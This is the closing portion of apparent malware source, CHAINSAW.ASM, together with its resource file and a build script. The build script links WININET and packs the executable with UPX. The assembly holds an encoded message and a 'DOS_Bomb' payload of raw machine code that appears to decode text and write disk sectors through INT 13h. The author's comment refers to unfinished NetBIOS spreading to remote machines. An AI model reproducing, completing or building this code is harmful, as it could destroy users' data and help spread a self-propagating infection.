; DB 46h, 2Bh, 33h, 25h, 2Eh, 46h, 29h, 20h, 46h, 32h
|
|||
|
; DB 2Eh, 23h, 46h, 2Bh, 27h, 22h, 46h, 27h, 28h, 22h
|
|||
|
; DB 6Bh, 6Ch, 2Bh, 27h, 25h, 27h, 24h, 34h, 23h, 46h
|
|||
|
; DB 27h, 35h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 31h, 23h
|
|||
|
; DB 34h, 23h, 46h, 32h, 29h, 46h, 35h, 23h, 23h, 46h
|
|||
|
; DB 32h, 2Eh, 27h, 32h, 46h, 22h, 27h, 3Fh, 48h, 46h
|
|||
|
; DB 20h, 29h, 34h, 46h, 32h, 2Eh, 23h, 2Bh, 46h, 27h
|
|||
|
; DB 28h, 46h, 2Fh, 22h, 3Fh, 2Ah, 2Ah, 2Fh, 25h, 6Bh
|
|||
|
; DB 6Ch, 35h, 33h, 2Bh, 2Bh, 23h, 34h, 46h, 27h, 20h
|
|||
|
; DB 32h, 23h, 34h, 28h, 29h, 29h, 28h, 46h, 22h, 34h
|
|||
|
; DB 2Fh, 30h, 23h, 46h, 24h, 23h, 25h, 27h, 2Bh, 23h
|
|||
|
; DB 46h, 27h, 46h, 28h, 2Fh, 21h, 2Eh, 32h, 2Bh, 27h
|
|||
|
; DB 34h, 23h, 48h, 46h, 32h, 2Eh, 23h, 46h, 23h, 30h
|
|||
|
; DB 23h, 28h, 32h, 35h, 46h, 29h, 20h, 6Bh, 6Ch, 32h
|
|||
|
; DB 2Eh, 27h, 32h, 46h, 22h, 27h, 3Fh, 46h, 31h, 23h
|
|||
|
; DB 34h, 23h, 46h, 32h, 29h, 46h, 2Ah, 23h, 27h, 22h
|
|||
|
; DB 46h, 32h, 29h, 46h, 32h, 2Eh, 23h, 46h, 22h, 2Fh
|
|||
|
; DB 35h, 25h, 29h, 30h, 23h, 34h, 3Fh, 46h, 29h, 20h
|
|||
|
; DB 46h, 29h, 28h, 23h, 46h, 29h, 20h, 46h, 32h, 2Eh
|
|||
|
; DB 23h, 46h, 2Bh, 29h, 35h, 32h, 6Bh, 6Ch, 24h, 2Fh
|
|||
|
; DB 3Ch, 27h, 34h, 34h, 23h, 46h, 25h, 34h, 2Fh, 2Bh
|
|||
|
; DB 23h, 35h, 46h, 2Fh, 28h, 46h, 32h, 2Eh, 23h, 46h
|
|||
|
; DB 27h, 28h, 28h, 27h, 2Ah, 35h, 46h, 29h, 20h, 46h
|
|||
|
; DB 27h, 2Bh, 23h, 34h, 2Fh, 25h, 27h, 28h, 46h, 2Eh
|
|||
|
; DB 2Fh, 35h, 32h, 29h, 34h, 3Fh, 4Ah, 6Bh, 6Ch, 32h
|
|||
|
; DB 2Eh, 23h, 46h, 32h, 23h, 3Eh, 27h, 35h, 46h, 25h
|
|||
|
; DB 2Eh, 27h, 2Fh, 28h, 46h, 35h, 27h, 31h, 46h, 2Bh
|
|||
|
; DB 27h, 35h, 35h, 27h, 25h, 34h, 23h, 48h, 48h, 48h
|
|||
|
; DB 44h, 6Bh, 6Ch
|
|||
|
;End_Trash_Text:
|
|||
|
; END START
|
|||
|
|
|||
|
DOS_Bomb: DB 0B8h, 013h, 035h, 0CDh, 021h, 089h, 01Eh, 026h, 001h
|
|||
|
DB 08Ch, 006h, 028h, 001h, 00Eh, 007h, 033h, 0F6h, 0BBh
|
|||
|
DB 035h, 001h, 0B9h, 065h, 002h, 080h, 030h, 066h, 046h
|
|||
|
DB 0E2h, 0FAh, 041h, 0BAh, 081h, 000h, 0B8h, 002h, 003h
|
|||
|
DB 09Ch, 09Ah, 000h, 000h, 000h, 000h, 0FEh, 0C6h, 075h
|
|||
|
DB 0F3h, 0FEh, 0CAh, 078h, 0EFh, 0C3h, 054h, 032h, 044h
|
|||
|
DB 032h, 02Eh, 023h, 046h, 020h, 02Fh, 02Ah, 02Bh, 046h
|
|||
|
DB 031h, 02Eh, 02Fh, 025h, 02Eh, 046h, 03Fh, 029h, 033h
|
|||
|
DB 046h, 027h, 034h, 023h, 046h, 027h, 024h, 029h, 033h
|
|||
|
DB 032h, 046h, 032h, 029h, 046h, 035h, 023h, 023h, 046h
|
|||
|
DB 02Fh, 035h, 046h, 027h, 028h, 046h, 027h, 025h, 025h
|
|||
|
DB 029h, 033h, 028h, 032h, 046h, 029h, 020h, 046h, 032h
|
|||
|
DB 02Eh, 023h, 06Bh, 06Ch, 032h, 034h, 027h, 021h, 023h
|
|||
|
DB 022h, 03Fh, 046h, 031h, 02Eh, 02Fh, 025h, 02Eh, 046h
|
|||
|
DB 024h, 023h, 020h, 023h, 02Ah, 02Ah, 046h, 027h, 046h
|
|||
|
DB 021h, 034h, 029h, 033h, 036h, 046h, 029h, 020h, 046h
|
|||
|
DB 020h, 02Fh, 030h, 023h, 046h, 03Fh, 029h, 033h, 032h
|
|||
|
DB 02Eh, 035h, 048h, 046h, 02Fh, 028h, 046h, 036h, 027h
|
|||
|
DB 034h, 032h, 02Fh, 025h, 033h, 02Ah, 027h, 034h, 06Bh
|
|||
|
DB 06Ch, 035h, 027h, 02Ah, 02Ah, 03Fh, 046h, 02Eh, 027h
|
|||
|
DB 034h, 022h, 023h, 035h, 032h, 03Fh, 046h, 027h, 028h
|
|||
|
DB 022h, 046h, 02Eh, 023h, 034h, 046h, 02Fh, 028h, 030h
|
|||
|
DB 027h, 02Ah, 02Fh, 022h, 046h, 024h, 034h, 029h, 032h
|
|||
|
DB 02Eh, 023h, 034h, 046h, 020h, 034h, 027h, 028h, 02Dh
|
|||
|
DB 02Ah, 02Fh, 028h, 048h, 046h, 02Fh, 032h, 046h, 02Fh
|
|||
|
DB 035h, 046h, 027h, 02Ah, 02Ah, 06Bh, 06Ch, 032h, 02Eh
|
|||
|
DB 023h, 046h, 02Bh, 029h, 034h, 023h, 046h, 032h, 034h
|
|||
|
DB 027h, 021h, 02Fh, 025h, 046h, 02Fh, 028h, 046h, 032h
|
|||
|
DB 02Eh, 027h, 032h, 046h, 032h, 02Eh, 023h, 03Fh, 046h
|
|||
|
DB 031h, 023h, 034h, 023h, 046h, 03Fh, 029h, 033h, 028h
|
|||
|
DB 021h, 048h, 046h, 024h, 033h, 032h, 04Ah, 046h, 02Eh
|
|||
|
DB 027h, 022h, 046h, 032h, 02Eh, 023h, 03Fh, 06Bh, 06Ch
|
|||
|
DB 02Ah, 02Fh, 030h, 023h, 022h, 046h, 030h, 023h, 034h
|
|||
|
DB 03Fh, 04Ah, 046h, 030h, 023h, 034h, 03Fh, 046h, 02Ah
|
|||
|
DB 029h, 028h, 021h, 046h, 02Ah, 02Fh, 030h, 023h, 035h
|
|||
|
DB 04Ah, 046h, 032h, 02Eh, 023h, 03Fh, 046h, 025h, 029h
|
|||
|
DB 033h, 02Ah, 022h, 046h, 028h, 029h, 032h, 046h, 02Eh
|
|||
|
DB 027h, 030h, 023h, 046h, 023h, 03Eh, 036h, 023h, 025h
|
|||
|
DB 032h, 023h, 022h, 06Bh, 06Ch, 028h, 029h, 034h, 046h
|
|||
|
DB 031h, 029h, 033h, 02Ah, 022h, 046h, 032h, 02Eh, 023h
|
|||
|
DB 03Fh, 046h, 02Eh, 027h, 030h, 023h, 046h, 031h, 02Fh
|
|||
|
DB 035h, 02Eh, 023h, 022h, 046h, 032h, 029h, 046h, 035h
|
|||
|
DB 023h, 023h, 046h, 027h, 035h, 046h, 02Bh, 033h, 025h
|
|||
|
DB 02Eh, 046h, 029h, 020h, 046h, 032h, 02Eh, 023h, 046h
|
|||
|
DB 02Bh, 027h, 022h, 046h, 027h, 028h, 022h, 06Bh, 06Ch
|
|||
|
DB 02Bh, 027h, 025h, 027h, 024h, 034h, 023h, 046h, 027h
|
|||
|
DB 035h, 046h, 032h, 02Eh, 023h, 03Fh, 046h, 031h, 023h
|
|||
|
DB 034h, 023h, 046h, 032h, 029h, 046h, 035h, 023h, 023h
|
|||
|
DB 046h, 032h, 02Eh, 027h, 032h, 046h, 022h, 027h, 03Fh
|
|||
|
DB 048h, 046h, 020h, 029h, 034h, 046h, 032h, 02Eh, 023h
|
|||
|
DB 02Bh, 046h, 027h, 028h, 046h, 02Fh, 022h, 03Fh, 02Ah
|
|||
|
DB 02Ah, 02Fh, 025h, 06Bh, 06Ch, 035h, 033h, 02Bh, 02Bh
|
|||
|
DB 023h, 034h, 046h, 027h, 020h, 032h, 023h, 034h, 028h
|
|||
|
DB 029h, 029h, 028h, 046h, 022h, 034h, 02Fh, 030h, 023h
|
|||
|
DB 046h, 024h, 023h, 025h, 027h, 02Bh, 023h, 046h, 027h
|
|||
|
DB 046h, 028h, 02Fh, 021h, 02Eh, 032h, 02Bh, 027h, 034h
|
|||
|
DB 023h, 048h, 046h, 032h, 02Eh, 023h, 046h, 023h, 030h
|
|||
|
DB 023h, 028h, 032h, 035h, 046h, 029h, 020h, 06Bh, 06Ch
|
|||
|
DB 032h, 02Eh, 027h, 032h, 046h, 022h, 027h, 03Fh, 046h
|
|||
|
DB 031h, 023h, 034h, 023h, 046h, 032h, 029h, 046h, 02Ah
|
|||
|
DB 023h, 027h, 022h, 046h, 032h, 029h, 046h, 032h, 02Eh
|
|||
|
DB 023h, 046h, 022h, 02Fh, 035h, 025h, 029h, 030h, 023h
|
|||
|
DB 034h, 03Fh, 046h, 029h, 020h, 046h, 029h, 028h, 023h
|
|||
|
DB 046h, 029h, 020h, 046h, 032h, 02Eh, 023h, 046h, 02Bh
|
|||
|
DB 029h, 035h, 032h, 06Bh, 06Ch, 024h, 02Fh, 03Ch, 027h
|
|||
|
DB 034h, 034h, 023h, 046h, 025h, 034h, 02Fh, 02Bh, 023h
|
|||
|
DB 035h, 046h, 02Fh, 028h, 046h, 032h, 02Eh, 023h, 046h
|
|||
|
DB 027h, 028h, 028h, 027h, 02Ah, 035h, 046h, 029h, 020h
|
|||
|
DB 046h, 027h, 02Bh, 023h, 034h, 02Fh, 025h, 027h, 028h
|
|||
|
DB 046h, 02Eh, 02Fh, 035h, 032h, 029h, 034h, 03Fh, 04Ah
|
|||
|
DB 06Bh, 06Ch, 032h, 02Eh, 023h, 046h, 032h, 023h, 03Eh
|
|||
|
DB 027h, 035h, 046h, 025h, 02Eh, 027h, 02Fh, 028h, 046h
|
|||
|
DB 035h, 027h, 031h, 046h, 02Bh, 027h, 035h, 035h, 027h
|
|||
|
DB 025h, 034h, 023h, 048h, 048h, 048h, 044h, 06Bh, 06Ch
|
|||
|
|
|||
|
END START
|
|||
|
|
|||
|
; *shrug*, haven't really finished this piece-o-crap,
|
|||
|
; mainly because I got fed up with all them bugs in
|
|||
|
; the server programs.. also not sure if the NetBios
|
|||
|
; shit works on remotes.. oh fuck it :|
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[CHAINSAW.ASM]<EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[CHAINSAW.RC]<EFBFBD><EFBFBD><EFBFBD>
|
|||
|
I ICON DISCARDABLE "BLACK.ICO"
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[CHAINSAW.RC]<EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[Q.BAT]<EFBFBD><EFBFBD><EFBFBD>
|
|||
|
TASM32 CHAINSAW.ASM /ml /m
|
|||
|
TLINK32 CHAINSAW.OBJ C:\TASM\LIB\IMPORT32.LIB WININET.LIB -aa
|
|||
|
BRC32 CHAINSAW.RC
|
|||
|
UPX\UPX CHAINSAW.EXE --force
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[Q.BAT]<EFBFBD><EFBFBD><EFBFBD>
|